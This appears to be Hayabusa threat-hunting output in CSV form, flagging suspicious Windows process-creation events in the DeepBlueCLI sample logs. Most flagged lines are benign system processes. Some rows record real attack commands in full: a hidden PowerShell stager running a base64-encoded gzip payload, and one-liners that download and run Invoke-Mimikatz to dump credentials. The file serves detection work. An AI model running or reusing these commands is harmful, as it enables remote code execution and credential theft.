2016-09-20 06:23:37.135 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:23:37.348 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAFhX4FcCA71WbW/aSBD+nEr9D1aFhK06GAgpTaRKZwMGEkwAB/NWVG3stVlYvMRe89brf78x2Alpm1PuTjoL5N2dmZ3ZZ57ZsRv5NifMF8JS5PbH1o4I39+/O+ugAC0FMbMqtL2NLGR2YRiRzXLtDD3p7AwUMkHppjMozUbl/lr4IogTdbWqsiUi/vT6uhIFAfb5cZ6rY66GIV4+UIJDURL+FAYzHODzu4c5trnwXch8y9Upe0A0UdtVkD3DwrnqO7GsxWwUh5gzV5RwMfv1a1aanBemudpjhGgoZs1dyPEy51CalYQfUuzwfrfCYtYgdsBC5vLcgPgXxVzfD5GL27DbGhuYz5gTZiU4DPwCzKPAF06PFe9z1BKzMOwEzFYdJ8AhGOWa/potsJjxI0pl4Q9xkgTRi3xOlhjkHAdsZeJgTWwc5hrIdyjuYXcqtvEmPftbjcRTI9Dq8ECSIT2vR2swJ6L4uEFW+jXeY2YleH7KLuDx4/279+/clBjOPuw442HxlBcwOpscxhgiFjssJAfdL0JeFgxwijgLdjDN3AcRlqbCJE7IZDoFX/rF2Kk5V/pwKb++TSG1AQu/uPs8tIdG+I2CZGIx4kzBMklcZlbuGfH66wSsYpf4uLrz0ZLYKcfE3+UBuxQfTp1L1doQm5hNBNipYoo9xGNIZWHyq1ltSfiTrRYR6uBAtSGXIUQFaZZeBnPMkpht+gZeAmLHeRZS4gKzcaqdsHmXeo/noJStUBSGstCJoLRsWTAxotiRBdUPSSJSI84Ow+xzuEZEObFRyNPtplKKY+KvwvyQB5ENSYSz35srbBNEYyhkoUEcrO1M4qV+s78FooIoJb4HO60hEbASA2DymBqBI7+ggZQzMW8uVxQvQfVQ6jpFHhR2UhcHSiEPO9mfA00Jf2R3DEmKxUmYkGeTMi4LFgk43BgxvCec+k/BnNwch7AqAU7yI6aFNNF2PKZ+Jrpc9Kxi+T4mawLYAZ6AAzR6wJYaCvGnkskDAE78oNyRigrPqOlTw9YWpKBuSKFpwL9PLpqsWnZub+YNJahuZ67aDJtGo1PtNhql9Y1plbhZa/LbTpMbteF8bqqNXn/Ex021cU/yi1Fpv7ohe7OlOqOt8mmv7Td5bbufe447qrquV3bNXuFSJ61Bpavli6hVrUWtgbbR8qWwRjaNLul3Fzc6fxhZFPVdxRsWrhDZtoK5VWDGvqmq9dmFvb9xrfrMcHajhnI1KC3UmqpW/Jqla+x2pAVqR7GQZ7HN7bxOB15F1XSb4HG3r2vdrq6p/fr8sXqleGA7RDNtYBXJeDXszWCuQwi3Sr7UdPCejboAUp2pyOuBjlcp2jMXdKofVe1jm4VFtNCYqoGOPn6EuEYrvUNBft8vMtWi7SFSW+OdriiFUaekNvJkUPfUeEvkaV2khuvqvqoULIc5g8v2yFWsIS0r1cr9ynYVRdk0qrf2uLD9fFcuafnHypIs6UPRUa76nzV/c+t11p7THZR72/buAfz1FcX6EPMGiJPxN4WCfdcr07vo4oQTrzUDAwXhDFHgClzvaenqLNCTi7rDSGwhis+dfIEDH1NofNAaU/arlDI7bh5P9zo0r2NLmUIl92F4UfztSBKeFKXnjpIuXV+PIVwoppTmuRb2PT6T89uLfB7aQn5bysPR337MClvtxKft5Li1vMDs1Bc9+JLiess8eI+PtUrzf4A0qfYZvJy3QPq89jfSN8Gcl19C8Yv45cI/wv3fYTFAhIO6CXcXxce2+jokCaFOvkuSpAFb3OSJPxTvIn7ehi+WvwCZDrcJpgoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:32:11.794 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfb0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:32:11.932 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 06:32:15.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb54 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 07:03:41.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7a4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 07:04:04.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 07:05:07.184 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x638 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 07:05:22.839 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 07:38:23.648 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:28.626 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:32.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:32.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:38.772 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x42c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:41.273 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf8c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:41.456 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:21:52.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\ri1rh0d1.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xb9c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:29:34.138 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x674 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:29:34.389 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x31c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:29:35.564 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\nkjhcxgj.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xfa0 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:36:49.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb80 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:36:49.699 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfec | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 08:36:50.791 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"" /noconfig /fullpaths @""C:\Users\IEUser\AppData\Local\Temp\gajrh2ob.cmdline"" | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | PID: 0xcbc | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:00:02.041 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x430 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x4b8 | User: IEUser | LID: 0x6593d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:22.985 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:45.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:45.870 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x62c | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:11:52.496 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:14:19.540 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:41.106 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 09:20:56.173 +09:00,IE10Win7,4688,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:00:00.931 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:28:55.331 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 10:28:55.343 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:31.558 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:32.423 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:32.538 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:38:43.023 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2016-09-20 12:44:04.646 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
